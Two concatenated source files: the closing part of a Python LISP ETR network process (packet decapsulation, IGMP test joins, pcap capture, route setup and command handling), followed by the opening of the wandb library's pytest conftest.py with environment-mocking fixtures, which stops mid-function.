# If we are looping back Map-Registers via encapsulation, overwrite
# multicast address with source address. That means we are sending a
# Map-Register message to the lisp-core process from our local RLOC
# address to our local RLOC address. Also, zero out the UDP checksum
# since the destination address change affects the pseudo-header.
#
if (lisp.lisp_decent_push_configured and
packet.inner_dest.is_multicast_address() and \
packet.lisp_header.get_instance_id() == 0xffffff):
sport = packet.udp_sport
packet = packet.packet[28::]
packet = lisp.lisp_packet_ipc(packet, source, sport)
lisp.lisp_ipc(packet, lisp_ipc_listen_socket, "lisp-ms")
return
#endif
#
# Check if inner packet is a LISP control-packet. Typically RLOC-probes
# from RTRs can come through NATs. We want to reply to the global address
# of the RTR which is the outer source RLOC. We don't care about the
# inner source port since the RTR will decapsulate a data encapsulated
# RLOC-probe Map-Reply.
#
if (packet.lisp_header.get_instance_id() == 0xffffff):
inner_ip = packet.packet
inner_lisp = inner_ip[28::]
ttl = -1
if (lisp.lisp_is_rloc_probe_request(inner_lisp[0])):
ttl = struct.unpack("B", inner_ip[8])[0] - 1
#endif
lisp.lisp_parse_packet(lisp_send_sockets, inner_lisp, source, 0, ttl)
return
#endif
#
# Packets are arriving on ephemeral socket. Need to check if another data-
# plane is running. If so, don't deliver duplicates.
#
if (lisp.lisp_ipc_data_plane):
lisp.dprint("Drop packet, external data-plane active")
return
#endif
#
# Increment global stats.
#
lisp.lisp_decap_stats["good-packets"].increment(len(packet.packet))
#
# Check if database-mapping exists for our local destination. When the
# destination is a multicast address, check if the source is our EID.
# That means we sent to a group we are members of. If using an RTR,
# it can't tell since the source RLOC could be rewritten by a NAT so
# the ETR must process the packet. If it decaps, the ITR on this system
# will pcap it and encap again. This will happen until the TTL reaches 0.
#
if (packet.inner_dest.is_multicast_address() == False):
db = lisp.lisp_db_for_lookups.lookup_cache(packet.inner_dest, False)
if (db):
db.increment_decap_stats(packet)
else:
lisp.dprint("No database-mapping found for EID {}".format( \
lisp.green(packet.inner_dest.print_address(), False)))
#endif
#endif
else:
if (lisp.lisp_db_for_lookups.lookup_cache(packet.inner_source, False)):
lisp.dprint("Discard echoed multicast packet")
return
#endif
#endif
#
# If this is a trace packet, lisp_trace_append() will swap addresses
# and send packet back to source. We have no app to forward this decap'ed
# packet to, so return.
#
if (packet.is_trace()):
if (lisp.lisp_trace_append(packet, ed="decap") == False): return
#endif
addr_str = "{} -> {}".format(packet.inner_source.print_address(),
packet.inner_dest.print_address())
lisp.dprint("{} packet for EIDs {}: {} ...".format( \
lisp.bold("NAT-Forward", False), lisp.green(addr_str, False),
lisp.lisp_format_packet(packet.packet[0:60])))
#
# Send on L2 socket since IPv6 raw sockets do not allow us to send an
# entire IPv6 header in payload. Prepend prebuilt MAC header.
#
if (packet.inner_version == 6):
packet.send_l2_packet(lisp_l2_socket, lisp_mac_header)
return
#endif
#
# Default to global raw socket otherwise get socket based on instance-ID.
#
raw_socket = packet.get_raw_socket()
if (raw_socket == None): raw_socket = lisp_raw_socket
#
# Send out on raw socket.
#
packet.send_packet(raw_socket, packet.inner_dest)
return
#enddef
#
# lisp_register_ipv6_group_entries
#
# Find an IPv6 group-mapping and send a Map-Register for each configured IPv6
# source for the IPv6 group-prefix found.
#
def lisp_register_ipv6_group_entries(group, joinleave):
ms_gm = lisp.lisp_lookup_group(group)
if (ms_gm == None): return
sg = []
for s in ms_gm.sources:
sg.append([s, group, joinleave])
#endfor
lisp_send_multicast_map_register(lisp_send_sockets, sg)
return
#enddef
#
# lisp_etr_join_leave_process
#
# Look at file-system to see if there is a join or leave to be done. This
# function will send joins in the form of building an IP/IGMPv2 packet to
# be passed to lisp_process_igmp_packet(). The groups that are joined are
# ones found as filenames in the current directory as "join-<group>". The
# IGMP Reports will be sent to lisp_process_igmp_packet() periodically.
#
# For right now, if the group address is IPv6, send a Map-Register directly.
# We will get to MLD support later.
#
# This is used for testing and not meant for production deployment.
#
def lisp_etr_join_leave_process():
global lisp_send_sockets
lisp.lisp_set_exception()
swap = socket.htonl
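#
# The 32-bit words below appear to encode an IPv4 header with a Router
# Alert option: version 4, IHL 6 (24 bytes), total length 32, TTL 1,
# protocol 2 (IGMP), source 10.207.193.90, destination 224.0.0.251. An
# IGMP Report or Leave is appended to it further below.
#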
ipigmp = [swap(0x46000020), swap(0x9fe60000), swap(0x0102d7cc),
swap(0x0acfc15a), swap(0xe00000fb), swap(0x94040000)]
packet = ""
for l in ipigmp: packet += struct.pack("I", l)
#
# Look for files in current directory for "join-<group>" and then send
# an IGMPv2 report to ourselves.
#
while (True):
groups = commands.getoutput("ls join-*").replace("join-", "")
groups = groups.split("\n")
for group in groups:
if (lisp.lisp_valid_address_format("address", group) == False):
continue
#endif
ipv6 = (group.find(":") != -1)
#
# Check if we are leaving group.
#
leavejoin = os.path.exists("leave-{}".format(group))
lisp.lprint("Internal {} group {}".format( \
"leaving" if leavejoin else "joining", group))
#
# Set IGMP message to Report or Leave. Then add group.
#
if (ipv6):
if (group.lower().find("ff02:") != -1):
lisp.lprint("Suppress registration for link-local groups")
continue
#endif
lisp_register_ipv6_group_entries(group, (leavejoin == False))
else:
send_packet = packet
if (leavejoin):
send_packet += struct.pack("I", swap(0x17000000))
else:
send_packet += struct.pack("I", swap(0x16000000))
#endif
octet = group.split(".")
value = int(octet[0]) << 24
value += int(octet[1]) << 16
value += int(octet[2]) << 8
value += int(octet[3])
send_packet += struct.pack("I", swap(value))
sg = lisp.lisp_process_igmp_packet(send_packet)
if (type(sg) != bool):
lisp_send_multicast_map_register(lisp_send_sockets, sg)
#endif
time.sleep(.100)
#endif
#endfor
time.sleep(10)
#endwhile
return
#enddef
#
# lisp_etr_process
#
# This thread receives LISP encapsulated packets addressed to destination
# port 4341, as well as IGMP reports. The IGMP reports can be captured on
# Ubuntu and Fedora but not on MacOS; Ubuntu and Fedora support IGMPv3 and
# MacOS supports IGMPv2 if we listen on "en0".
#
def lisp_etr_process():
lisp.lisp_set_exception()
if (lisp.lisp_myrlocs[0] == None): return
#
# Find all multicast RLEs so we can receive packets on underlay multicast
# groups.
#
rles = lisp.lisp_get_all_multicast_rles()
#
# We need to listen on en0 when doing IGMP testing on MacOS.
#
device = "any"
# device = "en0" if lisp.lisp_is_macos() else "any"
# device = "lo0" if lisp.lisp_is_macos() else "any"
pcap = pcappy.open_live(device, 1600, 0, 100)
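#
# The pcap filter built below matches, as best understood: any IGMP
# (proto 2) packet, plus packets destined to one of our local addresses
# or multicast RLEs that are LISP/VXLAN data (UDP dst port 4341, 8472,
# or 4789), are sourced from UDP port 4341, appear to be RLOC-probe
# Map-Requests on port 4342 (first UDP payload byte 0x12), or are
# fragmented UDP packets (the ip[6]/ip[7] flag and offset checks).
#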
pfilter = "(proto 2) or "
pfilter += "((dst host "
for addr in lisp.lisp_get_all_addresses() + rles:
pfilter += "{} or ".format(addr)
#endfor
pfilter = pfilter[0:-4]
pfilter += ") and ((udp dst port 4341 or 8472 or 4789) or "
pfilter += "(udp src port 4341) or "
pfilter += "(udp dst port 4342 and ip[28] == 0x12) or "
pfilter += "(proto 17 and (ip[6]&0xe0 == 0x20 or " + \
"(ip[6]&0xe0 == 0 and ip[7] != 0)))))"
lisp.lprint("Capturing packets for: '{}' on device {}".format(pfilter,
device))
pcap.filter = pfilter
#
# Enter receive loop.
#
pcap.loop(-1, lisp_etr_data_plane, [device, lisp_raw_socket])
return
#enddef
#
# lisp_etr_startup
#
# Initialize this LISP ETR process. Returns True on success and False on failure.
#
def lisp_etr_startup():
global lisp_ipc_listen_socket
global lisp_ephem_socket
global lisp_send_sockets
global lisp_raw_socket
global lisp_l2_socket
global lisp_mac_header
lisp.lisp_i_am("etr")
lisp.lisp_set_exception()
lisp.lisp_print_banner("ETR starting up")
#
# Get local address for source RLOC for encapsulation.
#
lisp.lisp_get_local_interfaces()
lisp.lisp_get_local_macs()
if (lisp.lisp_get_local_addresses() == False): return(False)
#
# Prebuild MAC header for lisp_l2_socket sending. Disabled code in favor
# of using pytun. See below.
#
# m = lisp.lisp_mymacs.keys()[0]
# mac = ""
# for i in range(0, 12, 2): mac += chr(int(m[i:i+2], 16))
# lisp_mac_header = mac + mac + "\x86\xdd"
# lisp.dprint("Built MAC header for L2 socket:",
# lisp.lisp_format_packet(lisp_mac_header))
#
# Used for listening for Info-Replies for NAT-traversal support.
#
s = lisp.lisp_open_listen_socket("0.0.0.0", str(lisp_ephem_port))
s.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, 32)
lisp_ephem_socket = s
#
# Open network send socket and internal listen socket.
#
lisp_ipc_listen_socket = lisp.lisp_open_listen_socket("", "lisp-etr")
lisp_send_sockets[0] = lisp_ephem_socket
lisp_send_sockets[1] = lisp.lisp_open_send_socket("", lisp.LISP_AFI_IPV6)
lisp_send_sockets[2] = lisp_ipc_listen_socket
#
# Open up raw socket so we can send with IP headers after decapsulation.
# There is a special case where the RTR's lisp_send_sockets array is of
# size 4 since we need to pass the raw socket through the lisp.py module
# to send a data encapsulated RLOC-probe to an ETR that sits behind a NAT.
# The test is in lisp_send_map_request() for this. This is the case in
# ETRs as well. All other components use an array size of 3.
#
lisp_raw_socket = socket.socket(socket.AF_INET, socket.SOCK_RAW,
socket.IPPROTO_RAW)
lisp_raw_socket.setsockopt(socket.SOL_IP, socket.IP_HDRINCL, 1)
lisp_send_sockets.append(lisp_raw_socket)
#
# Open a L2 socket so when we decapsulate and have to route an IPv6
# packet, we have the kernel receive a MAC frame on the loopback interface.
# We do this because there is no IP_HDRINCL for IPv6 raw sockets.
#
# Disabling this code in favor of using a tuntap tun interface via the
# pytun module. See code right below.
#
# if ("PF_PACKET" in dir(socket)):
# interface = "lo" if ("lo" in lisp.lisp_myinterfaces.keys()) else \
# "lo0" if ("lo0" in lisp.lisp_myinterfaces.keys()) else None
# if (interface != None):
# lisp_l2_socket = socket.socket(socket.PF_PACKET, socket.SOCK_RAW)
# lisp_l2_socket.bind(("lo", 0x86dd))
# #endif
# #endif
#
# Setup tuntap tunnel interface so when we decap IPv6 packets, we can
# send to kernel to route them.
#
if (pytun != None):
lisp_mac_header = '\x00\x00\x86\xdd'
device = "lispers.net"
try:
lisp_l2_socket = pytun.TunTapDevice(flags=pytun.IFF_TUN,
name=device)
os.system("ip link set dev {} up".format(device))
except:
lisp.lprint("Cannot create tuntap interface")
#endtry
#endif
#
# Start thread to listen on data socket.
#
threading.Thread(target=lisp_etr_process, args=[]).start()
#
# Test code to force IGMPv2 joins and leaves on an airplane. ;-)
#
threading.Thread(target=lisp_etr_join_leave_process, args=[]).start()
return(True)
#enddef
#
# lisp_etr_shutdown
#
# Shut down this process.
#
def lisp_etr_shutdown():
global lisp_register_timer
global lisp_etr_info_timer
#
# Cancel periodic Map-Register and Info timer threads.
#
if (lisp_register_timer): lisp_register_timer.cancel()
if (lisp_etr_info_timer): lisp_etr_info_timer.cancel()
#
# Close sockets.
#
lisp.lisp_close_socket(lisp_send_sockets[0], "")
lisp.lisp_close_socket(lisp_send_sockets[1], "")
lisp.lisp_close_socket(lisp_ipc_listen_socket, "lisp-etr")
return
#enddef
#
# lisp_etr_discover_eid
#
# Process IPC message from the lisp-itr process. It will be in the form of:
#
# "learn%<eid-string>%<interface-name>"
#
def lisp_etr_discover_eid(ipc):
ipc = ipc.split("%")
eid_str = ipc[1]
interface = ipc[2]
if (interface == "None"): interface = None
eid = lisp.lisp_address(lisp.LISP_AFI_NONE, "", 0, 0)
eid.store_address(eid_str)
#
# Do database-mapping lookup.
#
db = lisp.lisp_db_for_lookups.lookup_cache(eid, False)
if (db == None or db.dynamic_eid_configured() == False):
lisp.lprint("ITR/ETR dynamic-EID configuration out of sync for {}". \
format(lisp.green(eid_str, False)))
return
#endif
#
# Do logic checks. That is do not remove an entry if it is not there and
# don't try to add an entry if it is already cached.
#
dyn_eid = None
if (db.dynamic_eids.has_key(eid_str)): dyn_eid = db.dynamic_eids[eid_str]
if (dyn_eid == None and interface == None):
lisp.lprint("ITR/ETR state mismatch for {}".format( \
lisp.green(eid_str, False)))
return
#endif
#
# Check if ITR is changing the interface to the same interface, meaning
# it is confused. Otherwise, the IPC is an interface change. Don't register
# in this case.
#
if (dyn_eid and interface):
if (dyn_eid.interface == interface):
lisp.lprint("ITR sent redundant IPC for {}".format( \
lisp.green(eid_str, False)))
else:
lisp.lprint("Dynamic-EID {} interface change, {} -> {}".format( \
lisp.green(eid_str, False), dyn_eid.interface, interface))
dyn_eid.interface = interface
#endif
return
#endif
#
# Add new entry and register it.
#
if (interface):
dyn_eid = lisp.lisp_dynamic_eid()
dyn_eid.dynamic_eid.copy_address(eid)
dyn_eid.interface = interface
dyn_eid.get_timeout(interface)
db.dynamic_eids[eid_str] = dyn_eid
reg = lisp.bold("Registering", False)
eid_str = lisp.bold(eid_str, False)
lisp.lprint("{} dynamic-EID {} on interface {}, timeout {}".format(reg,
lisp.green(eid_str, False), interface, dyn_eid.timeout))
lisp_build_map_register(lisp_send_sockets, None, eid, None, False)
#
# Add /32 to routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route add {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
return
#endif
#
# Remove existing entry and deregister it.
#
if (db.dynamic_eids.has_key(eid_str)):
interface = db.dynamic_eids[eid_str].interface
dereg = lisp.bold("Deregistering", False)
lisp.lprint("{} dynamic-EID {}".format(dereg,
lisp.green(eid_str, False)))
lisp_build_map_register(lisp_send_sockets, 0, eid, None, False)
db.dynamic_eids.pop(eid_str)
#
# Delete /32 from routing table.
#
if (lisp.lisp_is_macos() == False):
eid_str = eid.print_prefix_no_iid()
cmd = "ip route delete {} dev {}".format(eid_str, interface)
os.system(cmd)
#endif
#endif
return
#enddef
#
# lisp_etr_process_rtr_updown
#
# Process IPC message from lisp-itr. It is telling the lisp-etr process
# whether RLOC-probing has determined that the RTR has gone up or down, and
# therefore whether it should be registered to the mapping system.
#
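# The IPC message is assumed to be of the form "rtr%<rtr-address>%<up|down>",
# matching the split below.
#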
def lisp_etr_process_rtr_updown(ipc):
if (lisp.lisp_register_all_rtrs): return
opcode, rtr_str, status = ipc.split("%")
if (lisp.lisp_rtr_list.has_key(rtr_str) == False): return
lisp.lprint("Process ITR IPC message, RTR {} has gone {}".format(
lisp.red(rtr_str, False), lisp.bold(status, False)))
rtr = lisp.lisp_rtr_list[rtr_str]
if (status == "down"):
lisp.lisp_rtr_list[rtr_str] = None
return
#endif
rtr = lisp.lisp_address(lisp.LISP_AFI_IPV4, rtr_str, 32, 0)
lisp.lisp_rtr_list[rtr_str] = rtr
return
#enddef
#
# lisp_etr_process_nonce_ipc
#
# Process a nonce IPC message from the ITR. It wants to know when a nonce
# is echoed from a remote ITR.
#
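# The IPC message is assumed to be of the form "nonce%<R|E>%<rloc>%<hex-nonce>",
# where opcode R means a request-nonce was sent and E means an echo-nonce was
# sent, matching the split and opcode checks below.
#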
def lisp_etr_process_nonce_ipc(ipc):
x, opcode, rloc_str, nonce = ipc.split("%")
nonce = int(nonce, 16)
echo_nonce = lisp.lisp_get_echo_nonce(None, rloc_str)
if (echo_nonce == None): echo_nonce = lisp.lisp_echo_nonce(rloc_str)
if (opcode == "R"):
echo_nonce.request_nonce_sent = nonce
lisp.lprint("Waiting for echo-nonce 0x{} from {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
elif (opcode == "E"):
echo_nonce.echo_nonce_sent = nonce
lisp.lprint("Sent echo-nonce 0x{} to {}".format( \
lisp.lisp_hex_string(nonce), lisp.red(echo_nonce.rloc_str, False)))
#endif
return
#enddef
#
# ETR commands processed by this process.
#
lisp_etr_commands = {
"lisp xtr-parameters" : [lispconfig.lisp_xtr_command, {
"rloc-probing" : [True, "yes", "no"],
"nonce-echoing" : [True, "yes", "no"],
"data-plane-security" : [True, "yes", "no"],
"data-plane-logging" : [True, "yes", "no"],
"frame-logging" : [True, "yes", "no"],
"flow-logging" : [True, "yes", "no"],
"nat-traversal" : [True, "yes", "no"],
"checkpoint-map-cache" : [True, "yes", "no"],
"ipc-data-plane" : [True, "yes", "no"],
"decentralized-push-xtr" : [True, "yes", "no"],
"decentralized-pull-xtr-modulus" : [True, 1, 0xff],
"decentralized-pull-xtr-dns-suffix" : [True],
"register-reachable-rtrs" : [True, "yes", "no"],
"program-hardware" : [True, "yes", "no"] }],
"lisp interface" : [lispconfig.lisp_interface_command, {
"interface-name" : [True],
"device" : [True],
"instance-id" : [True, 0, 0xffffffff],
"dynamic-eid" : [True],
"dynamic-eid-device" : [True],
"lisp-nat" : [True, "yes", "no"],
"dynamic-eid-timeout" : [True, 0, 0xff] }],
"lisp map-server" : [lisp_map_server_command, {
"ms-name" : [True],
"address" : [True],
"dns-name" : [True],
"authentication-type" : [False, "sha1", "sha2"],
"authentication-key" : [False],
"encryption-key" : [False],
"proxy-reply" : [False, "yes", "no"],
"want-map-notify" : [False, "yes", "no"],
"merge-registrations" : [False, "yes", "no"],
"refresh-registrations" : [False, "yes", "no"],
"site-id" : [False, 1, 0xffffffffffffffff] }],
"lisp database-mapping" : [lisp_etr_database_mapping_command, {
"prefix" : [],
"mr-name" : [True],
"ms-name" : [True],
"instance-id" : [True, 0, 0xffffffff],
"secondary-instance-id" : [True, 0, 0xffffffff],
"eid-prefix" : [True],
"group-prefix" : [True],
"dynamic-eid" : [True, "yes", "no"],
"signature-eid" : [True, "yes", "no"],
"rloc" : [],
"rloc-record-name" : [True],
"elp-name" : [True],
"geo-name" : [True],
"rle-name" : [True],
"json-name" : [True],
"address" : [True],
"interface" : [True],
"priority" : [True, 0, 255],
"weight" : [True, 0, 100] }],
"lisp explicit-locator-path" : [lispconfig.lisp_elp_command, {
"elp-name" : [False],
"elp-node" : [],
"address" : [True],
"probe" : [True, "yes", "no"],
"strict" : [True, "yes", "no"],
"eid" : [True, "yes", "no"] }],
"lisp replication-list-entry" : [lispconfig.lisp_rle_command, {
"rle-name" : [False],
"rle-node" : [],
"address" : [True],
"level" : [True, 0, 255] }],
"lisp geo-coordinates" : [lispconfig.lisp_geo_command, {
"geo-name" : [False],
"geo-tag" : [False] }],
"lisp json" : [lispconfig.lisp_json_command, {
"json-name" : [False],
"json-string" : [False] }],
"lisp group-mapping" : [lisp_group_mapping_command, {
"group-name" : [False],
"ms-name" : [True],
"group-prefix" : [False],
"instance-id" : [True, 0, 0xffffffff],
"rle-address" : [False],
"sources" : [],
"address" : [True] }],
"show database-mapping" : [lisp_etr_show_command, { }],
"show etr-keys" : [lisp_etr_show_keys_command, {}],
"show etr-dynamic-eid" : [lispconfig.lisp_show_dynamic_eid_command, { }]
}
#------------------------------------------------------------------------------
#
# Main entry point for process.
#
if (lisp_etr_startup() == False):
lisp.lprint("lisp_etr_startup() failed")
lisp.lisp_print_banner("ETR abnormal exit")
exit(1)
#endif
socket_list = [lisp_ephem_socket, lisp_ipc_listen_socket]
while (True):
try: ready_list, w, x = select.select(socket_list, [], [])
except: break
#
# Process Info-Reply messages received on ephemeral port.
#
if (lisp_ephem_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ephem_socket, False)
if (source == ""): break
if (port == lisp.LISP_DATA_PORT):
lisp_etr_nat_data_plane(lisp_raw_socket, packet, source)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
send_register = lisp.lisp_parse_packet(lisp_send_sockets, packet,
source, port)
#
# Info-Reply from map-server has new RTR-list, trigger a
# Map-Register and an Info-Request to the RTR.
#
if (send_register):
lisp_etr_info_timer = threading.Timer(0,
lisp_etr_process_info_timer, [None])
lisp_etr_info_timer.start()
lisp_register_timer = threading.Timer(0,
lisp_process_register_timer, [lisp_send_sockets])
lisp_register_timer.start()
#endif
#endif
#endif
#
# Process either commands, an IPC data-packet (for testing), or any
# protocol message on the IPC listen socket.
#
if (lisp_ipc_listen_socket in ready_list):
opcode, source, port, packet = \
lisp.lisp_receive(lisp_ipc_listen_socket, True)
if (source == ""): break
if (opcode == "command"):
if (packet.find("learn%") != -1):
lisp_etr_discover_eid(packet)
elif (packet.find("nonce%") != -1):
lisp_etr_process_nonce_ipc(packet)
elif (packet.find("clear%") != -1):
lispconfig.lisp_clear_decap_stats(packet)
elif (packet.find("rtr%") != -1):
lisp_etr_process_rtr_updown(packet)
elif (packet.find("stats%") != -1):
packet = packet.split("%")[-1]
lisp.lisp_process_data_plane_decap_stats(packet, None)
else:
lispconfig.lisp_process_command(lisp_ipc_listen_socket,
opcode, packet, "lisp-etr", [lisp_etr_commands])
#endif
elif (opcode == "api"):
lisp.lisp_process_api("lisp-etr", lisp_ipc_listen_socket, packet)
else:
if (lisp.lisp_is_rloc_probe_request(packet[0])):
lisp.lprint("ETR ignoring RLOC-probe request, using pcap")
continue
#endif
lisp.lisp_parse_packet(lisp_send_sockets, packet, source, port)
#endif
#endif
#endwhile
lisp_etr_shutdown()
lisp.lisp_print_banner("ETR normal exit")
exit(0)
#------------------------------------------------------------------------------
conftest.py
import requests_mock
import os
from click.testing import CliRunner
import pytest
from wandb.history import History
from tests.api_mocks import *
import wandb
from wandb import wandb_run
from wandb.apis import InternalApi
import six
import json
import sys
import threading
import logging
from multiprocessing import Process
from vcr.request import Request
from wandb import wandb_socket
from wandb import env
from wandb import util
from wandb.wandb_run import Run
from tests import utils
from tests.mock_server import create_app
def pytest_runtest_setup(item):
wandb.reset_env()
wandb.uninit()
global_settings = os.path.expanduser("~/.config/wandb/settings")
if os.path.exists(global_settings):
try:
os.remove(global_settings)
except OSError:
pass
# This is used to find tests that are leaking outside of tmp directories
os.environ["WANDB_DESCRIPTION"] = item.parent.name + "#" + item.name
def request_repr(self):
try:
body = json.loads(self.body)
query = body.get("query") or "no_query"
render = query.split("(")[0].split("\n")[0] + " - vars: " + str(body.get("variables", {}).get("files", {}))
except (ValueError, TypeError):
render = "BINARY"
return "({}) {} - {}".format(self.method, self.uri, render)
Request.__repr__ = request_repr
# To enable VCR logging uncomment below
#logging.basicConfig() # you need to initialize logging, otherwise you will not see anything from vcrpy
#vcr_log = logging.getLogger("vcr")
#vcr_log.setLevel(logging.INFO)
@pytest.fixture(scope='module')
def vcr_config():
def replace_body(request):
if "storage.googleapis.com" in request.uri:
request.body = "BINARY DATA"
elif "/file_stream" in request.uri:
request.body = json.dumps({"files": list(json.loads(request.body).get("files", {}).keys())})
return request
def replace_response_body(response, *args):
"""Remove gzip response from pypi"""
if response["headers"].get("Access-Control-Expose-Headers") == ['X-PyPI-Last-Serial']:
if response["headers"].get("Content-Encoding"):
del response["headers"]["Content-Encoding"]
response["body"]["string"] = '{"info":{"version": "%s"}' % wandb.__version__
return response
return {
# Replace the Authorization request header with "DUMMY" in cassettes
"filter_headers": [('authorization', 'DUMMY')],
"match_on": ['method', 'uri', 'query', 'graphql'],
"before_record": replace_body,
"before_record_response": replace_response_body,
}
@pytest.fixture(scope='module')
def vcr(vcr):
def vcr_graphql_matcher(r1, r2):
if "/graphql" in r1.uri and "/graphql" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["query"].strip() == body2["query"].strip()
elif "/file_stream" in r1.uri and "/file_stream" in r2.uri:
body1 = json.loads(r1.body.decode("utf-8"))
body2 = json.loads(r2.body.decode("utf-8"))
return body1["files"] == body2["files"]
vcr.register_matcher('graphql', vcr_graphql_matcher)
return vcr
@pytest.fixture
def local_netrc(monkeypatch):
with CliRunner().isolated_filesystem():
# TODO: this seems overkill...
origexpand = os.path.expanduser
def expand(path):
return os.path.realpath("netrc") if "netrc" in path else origexpand(path)
monkeypatch.setattr(os.path, "expanduser", expand)
yield
@pytest.fixture
def history():
with CliRunner().isolated_filesystem():
yield Run().history
@pytest.fixture
def wandb_init_run(request, tmpdir, request_mocker, mock_server, monkeypatch, mocker, capsys, local_netrc):
"""Fixture that calls wandb.init(), yields a run (or an exception) that
gets created, then cleans up afterward. This is meant to test the logic
in wandb.init, it should generally not spawn a run_manager. If you need
to test run_manager logic use that fixture.
"""
# save the environment so we can restore it later. pytest
# may actually do this itself. didn't check.
orig_environ = dict(os.environ)
orig_namespace = None
run = None
# Reset the tensorboard and pytest state
wandb.tensorboard.reset_state()
wandb._global_watch_idx = 0
try:
with CliRunner().isolated_filesystem():
if request.node.get_closest_marker('jupyter'):
def fake_ipython():
class Jupyter(object):
__module__ = "jupyter"
def __init__(self):
class Hook(object):
def register(self, what, where):
pass
class Pub(object):
def publish(self, **kwargs):
pass
class Hist(object):
def get_range(self, **kwargs):
return [[None, 1, ('#source code', None)]]
self.events = Hook()
self.display_pub = Pub()
self.history_manager = Hist()
def register_magics(self, magic):
pass
return Jupyter()
wandb.get_ipython = fake_ipython
wandb.jupyter.get_ipython = fake_ipython
# no i/o wrapping - it breaks pytest
os.environ['WANDB_MODE'] = 'clirun'
if request.node.get_closest_marker('headless'):
mocker.patch('subprocess.Popen')
else:
def mock_headless(run, cloud=True):
print("_init_headless called with cloud=%s" % cloud)
mocker.patch('wandb._init_headless', mock_headless)
if not request.node.get_closest_marker('unconfigured'):
os.environ['WANDB_API_KEY'] = 'test'
os.environ['WANDB_ENTITY'] = 'test'
os.environ['WANDB_PROJECT'] = 'unit-test-project'
else:
# when unconfigured we enable run mode to test missing creds
os.environ['WANDB_MODE'] = 'run'
monkeypatch.setattr('wandb.apis.InternalApi.api_key', None)
monkeypatch.setattr(
'getpass.getpass', lambda x: "0123456789012345678901234567890123456789")
assert InternalApi().api_key == None
os.environ['WANDB_RUN_DIR'] = str(tmpdir)
if request.node.get_closest_marker('silent'):
os.environ['WANDB_SILENT'] = "true"
orig_namespace = vars(wandb)
assert wandb.run is None
# Mock out run_manager, we add it to run to access state in tests
orig_rm = wandb.run_manager.RunManager
mock = mocker.patch('wandb.run_manager.RunManager')
def fake_init(run, port=None, output=None, cloud=True):
print("Initialized fake run manager")
rm = fake_run_manager(mocker, run, cloud=cloud, rm_class=orig_rm)
rm._block_file_observer()
run.run_manager = rm
return rm
mock.side_effect = fake_init
if request.node.get_closest_marker('args'):
kwargs = request.node.get_closest_marker('args').kwargs
# Unfortunately needed to enable the test to work
if kwargs.get("dir"):
del os.environ['WANDB_RUN_DIR']
if kwargs.get("tensorboard"):
# The test uses tensorboardX so we need to be sure it's imported
# we use get_module because tensorboardX isn't available in py2
wandb.util.get_module("tensorboardX")
if kwargs.get("error"):
err = kwargs["error"]
del kwargs['error']
if err == "io":
@classmethod
def error(cls):
raise IOError
monkeypatch.setattr(
'wandb.wandb_run.Run.from_environment_or_defaults', error)
elif err == "socket":
class Error(object):
@property
def port(self):
return 123
def listen(self, secs):
return False, None
monkeypatch.setattr("wandb.wandb_socket.Server", Error)
if kwargs.get('k8s') is not None:
token_path = "/var/run/secrets/kubernetes.io/serviceaccount/token"
crt_path = "/var/run/secrets/kubernetes.io/serviceaccount/ca.crt"
orig_exist = os.path.exists
def exists(path):
return True if path in token_path else orig_exist(path)
def magic(path, *args, **kwargs):
if path == token_path:
return six.StringIO('token')
mocker.patch('wandb.util.open', magic, create=True)
mocker.patch('wandb.util.os.path.exists', exists)
os.environ["KUBERNETES_SERVICE_HOST"] = "k8s"
os.environ["KUBERNETES_PORT_443_TCP_PORT"] = "123"
os.environ["HOSTNAME"] = "test"
if kwargs["k8s"]:
request_mocker.register_uri("GET", "https://k8s:123/api/v1/namespaces/default/pods/test",
content=b'{"status":{"containerStatuses":[{"imageID":"docker-pullable://test@sha256:1234"}]}}')
else:
request_mocker.register_uri("GET", "https://k8s:123/api/v1/namespaces/default/pods/test",
content=b'{}', status_code=500)
del kwargs["k8s"]
if kwargs.get('sagemaker'):
del kwargs['sagemaker']
config_path = "/opt/ml/input/config/hyperparameters.json"
resource_path = "/opt/ml/input/config/resourceconfig.json"
secrets_path = "secrets.env"
os.environ['TRAINING_JOB_NAME'] = 'sage'
os.environ['CURRENT_HOST'] = 'maker'
orig_exist = os.path.exists
def exists(path):
return True if path in (config_path, secrets_path, resource_path) else orig_exist(path)
mocker.patch('wandb.os.path.exists', exists)
def magic(path, *args, **kwargs):
if path == config_path:
return six.StringIO('{"fuckin": "A"}')
elif path == resource_path:
return six.StringIO('{"hosts":["a", "b"]}')
elif path == secrets_path:
return six.StringIO('WANDB_TEST_SECRET=TRUE')
else:
return six.StringIO()
mocker.patch('wandb.open', magic, create=True)
mocker.patch('wandb.util.open', magic, create=True)
elif kwargs.get("tf_config"):
os.environ['TF_CONFIG'] = json.dumps(kwargs['tf_config'])
del kwargs['tf_config']
elif kwargs.get("env"):
for k, v in six.iteritems(kwargs["env"]):
os.environ[k] = v
del kwargs["env"]
else:
kwargs = {}
if request.node.get_closest_marker('resume'):
# env was leaking when running the whole suite...
if os.getenv(env.RUN_ID):
del os.environ[env.RUN_ID]
os.mkdir(wandb.wandb_dir())
with open(os.path.join(wandb.wandb_dir(), wandb_run.RESUME_FNAME), "w") as f:
f.write(json.dumps({"run_id": "test"}))
try:
print("Initializing with", kwargs)
run = wandb.init(**kwargs)
if request.node.get_closest_marker('resume') or request.node.get_closest_marker('mocked_run_manager'):
# Reset history
run._history = None
rm = wandb.run_manager.RunManager(run)
rm.init_run(os.environ)
if request.node.get_closest_marker('mock_socket'):
run.socket = mocker.MagicMock()
assert run is wandb.run
assert run.config is wandb.config
except wandb.LaunchError as e:
print("!!! wandb LaunchError raised")
run = e
yield run
if hasattr(run, "run_manager"):
print("Shutting down run manager")
run.run_manager.test_shutdown()
finally:
# restore the original environment
os.environ.clear()
os.environ.update(orig_environ)
wandb.uninit()
wandb.get_ipython = lambda: None
assert vars(wandb) == orig_namespace
def fake_run_manager(mocker, run=None, cloud=True, rm_class=wandb.run_manager.RunManager):
